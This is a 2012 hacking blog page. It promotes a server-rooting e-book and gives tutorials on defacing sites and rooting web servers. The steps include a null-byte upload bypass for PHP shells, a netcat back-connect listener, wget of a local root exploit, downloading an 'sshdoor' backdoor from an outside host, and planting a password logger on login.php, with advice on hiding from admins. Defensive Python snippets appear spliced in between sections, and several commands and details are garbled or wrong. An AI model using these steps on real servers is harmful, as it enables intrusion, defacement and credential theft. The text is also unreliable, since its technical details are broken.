Wednesday, August 29, 2012

How to r00t on server: E-book by Black-X Genius

Hi guys... I've got many messages in my inbox about server r00t. I think too many people are interested in server r00t, so today I'm presenting my Tunisian friend Black-X Genius's ebook on server r00ting. Hope you will enjoy the book.

This small book will explain to you how professional hackers got root on servers.
This book is for beginners.

Lessons of the Book

Lesson 1 - What is Root?
Lesson 2 - How can I get on the Root?
Lesson 3 - Local root and how to search for him?
Lesson 4 - How connect the server?
Lesson 5 - How to get Root access?
Lesson 6 - What happen after the root?
Lesson 7 - The withdrawal of my domain?
Lesson 8 - How to do mass deface?
Lesson 9 - How to register the hacked websites on Zoneh?
Lesson 10 - How to clear tracks from server?

Download Link - http://www.mediafire.com/?tzmsm3l5d7zj864

Tuesday, August 28, 2012

How to Deface a Rooted Server


How to Deface a "r00ted" Server

Please try to follow along even if in some parts I am not making any sense to you.
Thank you and enjoy the TuT.

**********STEP 1**********

First, what you want to do is get an idea of what you want the deface to say and what language you're most likely going to use.
*** Common languages for deface are ***
1. HTML
2. CSS
3. XML
4. PHP (not too sure about this one)
5. CS5 using Adobe (if you wanna get fancy)
The choices may vary....
But for this TuT we are going to use HTML because it's more common. Whatever language you happen to choose (I recommend HTML), you want to make sure you brush up on it and are very familiar with it, so as to be able to make a decent-looking file to host on the "rooted" server.


**********STEP 2**********

The next thing you want to do is look at the server database of the location where you are going to be hosting the .html deface file and see what the server will take and will not take from .html files. THIS IS VERY IMPORTANT: you must check with the server and test out the files before you try to host or make your deface html file (some servers I come across will only host XML or CSS). You want to make sure you know what type of language it will host and what it will not host.
A lot of the time servers can be very expandable, so they will take mostly anything you throw at them, but just to be sure please check.

**********STEP 3**********

Well, once you have done all your checking and you have looked at the server and you have a basic idea of what you'll be doing, we can start building your deface file.

*** Tools you will need ***

1. Notepad++ (I recommend this version of Notepad)
2. A guide to all the html or the language you'll be using,
unless you're a TOTAL NINJA at the language, then you can
skip this tool
3. (This one you'll need; it will cut the work almost in half)
phpMyAdmin - this tool will let you test your .html etc. and it won't take you a sec to download. Here's the link: http://www.phpmyadmin.net/home_page/index.php
-OK, once you have all the tools listed here (guide is optional) you can start building the .html file using the tools I just listed. It should be a snap if done right.
-OK, listen up here!! At this point you might think I'm also going to show you how to write html too, huh? Well, sorry to say it, but showing you how to write html and explaining how to do this would take WAY!! too long, and if you're here on a defacing TuT and you don't know how to write html then you should really be in an html TuT. My html TuT is coming soon!!!
-OK, so once you have your html file made you can save it as a .html file. You can name it whatever you want; it doesn't matter, it won't affect the process at all. Once you have tested it out on phpMyAdmin and you are happy with the results, then you can start the defacing!


**********STEP 4**********

-OK, the next step you want to take is opening your "rooted" server,
BUT you always want to be sure, VERY sure, that you have a good proxy server running and that you always have multi s0cks for your http browser when you are entering a "r00ted" server, and never EVER EVER!!! set the server config settings to your own settings (most servers have auto config for the admin account). This logs the last login from the admin and adds the IP and port number it came from, and if you don't have a pr0xy and good s0cks then you must be VERY careful of the IP and port you use, and NEVER! set the config up yourself; you'll screw up the IP settings on the server.

**********STEP 5**********

-OK, once you are in the admin accounts and the server settings, you want to look for an .html etc. and you want to copy all of the code you see. Then you want to open your regular notepad and paste all the code inside the notepad doc. After the code is all in there you want to save the doc as a .html file; name it whatever. Then you want to open it and see if the file looks like the site server you "r00ted". If so, then you want to go back to the server and erase all of the code that you copied. After you have done that you want to refresh the server settings and type in the URL of the site that you "r00ted". If nothing shows up but the page is done loading, then that means you have just taken the html visuals out and the site is faceless!!!

**********STEP 6**********

-OK, once the site is faceless you want to go back to the server settings and you want to add your file and make sure that the server is running the defacing file. So about this point you think you're done, huh? Well, wrong, you're not: you need to make a path for the file and for the user to be redirected to. If this step is not done, all the user will see is the blank page. Another reason why you need a path is because if the admin of the server ever gets back the admin account it will be harder for them to find the file from where the defacing is coming from, thus making it harder for them to take it down.

**********STEP 7**********

-OK, in order to make a good path for the file you must find an empty path name on the server that is not being used by another file hosted by the server. When I look for one I try to find the dorks for them on Google.com,
but you will just guess most of the time and land on an empty one all the time. Most small sites have all the common ones and not the FTP paths and the .asp paths, but it's all up to you!
Once you have your file hosted and your path is found, all you have to do is replace the URL of the site and the redirect URL of the site to both of your html file and your path.
EXAMPLE: http://www.example.com/(your file path here).html
Then you want to replace the regular URL with yours and try it out!!!!
If all came out well and the deface page looks good then your mission is completed!!!
You have just defaced a website!!
If Google doesn't pick up on it then give it a day or two, then try again; I'm sure it will work!! Then the final step is to brag to all your friends about your hacked! site.
Thank you for reading...
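
For the site owner, the changes described in Steps 5 to 7 (an existing page blanked, a new file appearing at a previously unused path) are exactly what a web-root integrity check reports. The following Python sketch is an added example, not part of the original post; the watched extensions, function names and the temporary web root built in `demo()` are assumptions constructed for illustration.

```python
import hashlib
import os
import tempfile

WATCHED = (".html", ".htm", ".php", ".css", ".xml")  # assumed set of served types


def snapshot(root):
    """Return {relative_path: (sha256_hex, size)} for watched files under root."""
    state = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(WATCHED):
                path = os.path.join(dirpath, fname)
                with open(path, "rb") as fh:
                    data = fh.read()
                rel = os.path.relpath(path, root)
                state[rel] = (hashlib.sha256(data).hexdigest(), len(data))
    return state


def compare(baseline, current):
    """Return sorted (path, finding) pairs describing drift from the baseline."""
    findings = []
    for rel, (digest, size) in current.items():
        if rel not in baseline:
            findings.append((rel, "added"))
        elif size == 0 and baseline[rel][1] > 0:
            findings.append((rel, "emptied"))
        elif digest != baseline[rel][0]:
            findings.append((rel, "modified"))
    findings += [(rel, "removed") for rel in baseline if rel not in current]
    return sorted(findings)


def demo():
    """Constructed web root: blank the index, add a new page, then compare."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("index.html", "<h1>Shop</h1>"), ("about.html", "<p>Us</p>")):
            with open(os.path.join(root, name), "w") as fh:
                fh.write(body)
        baseline = snapshot(root)
        open(os.path.join(root, "index.html"), "w").close()   # page blanked
        with open(os.path.join(root, "x1.html"), "w") as fh:   # new file appears
            fh.write("<h1>defaced</h1>")
        return compare(baseline, snapshot(root))
```

Keep the baseline off the web server so that an intruder with write access to the web root cannot rewrite it along with the pages.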

Server Rooting Full Tutorial

Rooting isn’t just simply finding a local root exploit.
Rooting is gaining a high uid on a server, which gives the status to control the entire server.
Most people think they are actually completing their step in rooting when they are not;
all people do is a mix of the following, in this order:

1. Back Connect OR use the prompt in the shell itself and type in uname -a

2. Get the version for the box, it may be similar to 2.6.18

3. Go on securityfocus or 1337day.com and search for it.

4. Get a connection via back-connect, then they simply wget a Local Root Exploit.

Or simply go to the PHP shell itself and go to a dir and upload a .C file which contains a Local Root Exploit.

5. Get the ID it was labeled, it will be featured in the wget results,
or if you did it via shell, you will know the name it was given because you uploaded it.

6. Then simply gcc -o ExploitName or gcc -o LocalRootExploitName.c

But today I will be showing you how to do this and actually understand what you are doing.
You will use 1337day and while you're doing this you will upgrade your knowledge.

First, get your PHP shell. You can upload it through FTP using mput
(mput is a command used to add something on a server included from your system, example: mput C:\users\X-pOSed\shell.php).
Or you can do it if you find an upload.php dir on the system.
Of course upload.php can feature uploading php,
or it may accept only .jpg/.png/etc. Well,
this can easily be bypassed through a Null Byte Upload. To do this,
all you need to do is compile your php script into a .jpg function.

You can do this by following these steps:

1. Open Notepad

2. Add your php script

3. File >> Save as >> shellname.php.jpg (you have to leave it is a URL-Encoded Byte)

4. Upload on the server.

Null Byte is used to terminate anything after it.

But this can be patched on some web servers, so DO NOT expect it to work 100%.
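
On the server side, the double-extension and null-byte filename trick described above is closed by decoding and validating the name, checking the content, and never storing the file under the client's name. The following Python sketch is an added example, not code from the original post; the allowlist, the list of interpreter extensions, the function names and the sample filenames are assumptions constructed for illustration.

```python
import os
import re
import uuid
from urllib.parse import unquote

# Assumed allowlist: extension -> leading magic bytes of that image type.
ALLOWED = {".jpg": b"\xff\xd8\xff", ".png": b"\x89PNG\r\n\x1a\n"}
# Extensions a web server may hand to an interpreter (assumed list).
EXECUTABLE = re.compile(r"\.(php\d?|phtml|phar|pl|py|cgi|asp|aspx|jsp|sh)(\.|$)", re.I)
JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16  # constructed stand-in for image bytes


def check_upload(client_name, content):
    """Return (ok, reason, stored_name); stored_name is generated server-side."""
    name = client_name
    for _ in range(3):  # decode repeatedly so %00 and %2500 are both exposed
        decoded = unquote(name)
        if decoded == name:
            break
        name = decoded
    if "\x00" in name:
        return False, "null byte in filename", None
    base = os.path.basename(name.replace("\\", "/"))
    if base != name or base.startswith("."):
        return False, "path component or hidden file", None
    if EXECUTABLE.search(base):
        return False, "executable extension present", None
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        return False, "extension not on allowlist", None
    if not content.startswith(ALLOWED[ext]):
        return False, "content does not match extension", None
    return True, "ok", uuid.uuid4().hex + ext  # never reuse the client's name


def demo():
    """Run constructed filenames through the check and return the reasons."""
    cases = [("photo.jpg", JPEG), ("shell.php.jpg", JPEG),
             ("shell.php%00.jpg", JPEG), ("photo.jpg", b"<?php echo 1; ?>")]
    return [check_upload(n, c)[1] for n, c in cases]
```

Storing uploads outside the web root, or in a directory where the server is configured not to execute scripts, covers the cases a filename check misses.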

But if /upload.php features an accessible function for the extension .php,
then upload your normal PHP shell. And then you need to find the directory;
you can usually get this by doing the following:

1. Your victimized site has to have Anonymous User enabled.

2. Open Command Prompt

3. Type in ftp http://www.victim.com

4. Enter wrong details when it asks for user and password

5. After that is finished type in: quote user ftp (It quotes the user under the name FTP) then type in: quote cwd ~root (Pertains the cwd of root) then type in: quote pass ftp

Now you have the ability to view dirs, cd to directories, etc.

Try finding incoming, and if you do, try finding your shell.

If you cannot find anything, there are other things you can do.

You can use acunetix web scanner to find directories.

After you have got your shell up and ready, play around a bit,
and try finding mysql details (in config.php), irc details (in ircd.conf), etc. If you find them, there is probably a mysql option in your shell; use it.
You can also try logging in with those details in SSH, which can get you root easily. To try this out, you cannot just telnet to port 22, because port 22 (ssh) has its own client/server.

Download PuTTY.

Insert the site you want to connect to, and be sure the label is selected on SSH.

Once you do that, press Open.

Now try the details you got in config.php

If it doesn’t work, you're out of luck on that probability.

But, we do not stop there.

Go to "Back Connection"; your IP is in the text box and in the second text box is your port.
The port you want to back-connect to needs to be forwarded. This can be easily done if you locate your HTTP config for your router.
You can find this in command prompt by typing in ipconfig, and in Linux all you need to do is type in ifconfig.

Now go to the main router page (192.168.0.1 as an example), then search around for Port Forwarding. Your router page may require a password;
if it's changed, just simply restart your router, and if it still does not work, search on Google.

After your port is forwarded (port forward example: 1337) insert it into the second text box. But wait up, you're not done. You will need to install netcat;
in Linux simply:

sudo apt-get install netcat

And in Windows, go to this link:

Click Here

You might need to uninstall winrar. Well, put nc111nt.zip in a directory: on your desktop, documents, anywhere. I recommend putting it on the desktop for the time being.

Then open Command Prompt, then type in cd C:\users\NAME\desktop\nc111nt or cd C:\users\NAME\desktop\nc111nt.zip

Now when you're in there, type:

nc

If anything comes back, it's working.

Now type in:

nc -l -n -v -p PORT

PORT needs to be replaced with the port you forwarded.

Press enter, then go to your shell and press the magic button ( On the back-connection page where you inserted your IP along with the forwarded port).

Now you should be in your back-connect session. Type in:

uname -a

This will show us its current Linux Version, SMTP Version, PHP version, etc, for example:

Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Mon Jar 30 08:14:05 EDT 2011 i686

Now you go to 1337day.com, as you can see .

There are various more; all you need to do is go to 1337day and search for 2.6.17

That there is a C script that can be used for gaining root on the server.
Well, we can do this two ways, lets discuss the first:

1. Open Notepad

2. Put in the C script

3. File >> Save as >> LocalRootExploit.C

4. Upload it on the shell

5. Open your netcat session

6. Type in gcc root -o LocalRootExploit.c (gcc is a command in ssh used for compiling a certain directory,
this tells it to make a root dir, and open it as what we earlier uploaded via our shell, which in this case is LocalRootExploit.c)

7. Type in ./root

8. It should clearly compile and give you root. To be sure simply type in:
whoami and/or id. If whoami comes back with root, you’ve completed your mission, and if id comes back with something like: uid=(0)root, you’ve completed your mission as well.

Or we can do this via netcat:

1. Go to your netcat session

2. Type in wget http://milw0rm.com/exploits/5092 (wget is used to download a file from a particular server, in this case: milw0rm)

4. Now considering 5092 was the last bit in our URL, that is what we will need to compile it as

5. Type in gcc root -o 5092 (gcc is a command in ssh used for compiling a certain directory,
this tells it to make a root dir, and open it as what we earlier wget’d, which in this case is 5092)

7. Type in ./root

8. It should clearly compile and give you root. To be sure simply type in:
whoami and/or id. If whoami comes back with root, you’ve completed your mission, and if id
comes back with something like: uid=(0)root, you’ve completed your mission as well.

Now you can add an sshdoor via:

wget http://www.familysksd.phpnet.us/sshdoor

You can use plenty of commands and even sudo apt-get install some accessories. You can also use the Edit command or Emacs command to add a password logger (php based) on login.php.
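
The sequence this post walks through (uname -a, wget, gcc, running the compiled binary, then whoami as root) is visible to a defender as a web-server account doing things a web server never needs to do. The following Python sketch is an added example, not part of the original post: it scans process-execution records for that pattern. The one-line log format, the account list and the sample records are assumptions constructed for illustration; real audit logs need their own parser.

```python
import re
import shlex
from collections import defaultdict

# Accounts a web server commonly runs as (assumed; adjust per host).
SERVICE_USERS = {"apache", "www-data", "nginx", "nobody"}
STAGES = {"recon": {"uname", "id", "whoami"}, "download": {"wget", "curl"},
          "compile": {"gcc", "cc"}}
LINE = re.compile(r'^(\S+) user=(\S+) parent=(\S+) cmd="(.*)"$')
# Constructed sample in a made-up one-line-per-exec format.
SAMPLE_LOG = """\
2012-08-29T10:00:01 user=apache parent=httpd cmd="uname -a"
2012-08-29T10:00:40 user=apache parent=sh cmd="wget http://files.example/x.c"
2012-08-29T10:01:05 user=apache parent=sh cmd="gcc x.c -o root"
2012-08-29T10:01:09 user=apache parent=sh cmd="./root"
2012-08-29T10:01:12 user=root parent=root cmd="whoami"
2012-08-29T10:02:00 user=deploy parent=bash cmd="gcc app.c -o app"
2012-08-29T10:03:00 user=www-data parent=php-fpm cmd="convert in.png out.jpg"
"""


def classify(cmd):
    """Map a command line to a stage name, or None if uninteresting."""
    argv = shlex.split(cmd) or [""]
    if argv[0].startswith("./"):
        return "exec_local"
    name = argv[0].rsplit("/", 1)[-1]
    return next((s for s, names in STAGES.items() if name in names), None)


def analyze(log_text):
    seen = defaultdict(set)   # service user -> stages observed so far
    launched = set()          # local binaries started by service users
    alerts = []
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        ts, user, parent, cmd = m.groups()
        stage = classify(cmd)
        if user in SERVICE_USERS and stage:
            seen[user].add(stage)
            if stage == "exec_local":
                launched.add(shlex.split(cmd)[0][2:])
            if stage == "compile" or (stage == "exec_local" and "download" in seen[user]):
                alerts.append((ts, user, "service account ran " + stage))
        elif user == "root" and parent in launched:
            alerts.append((ts, user, "root process spawned by service-launched binary"))
    return alerts
```

Removing the compiler from production web hosts and mounting upload and temp directories noexec takes away the steps this detector watches for.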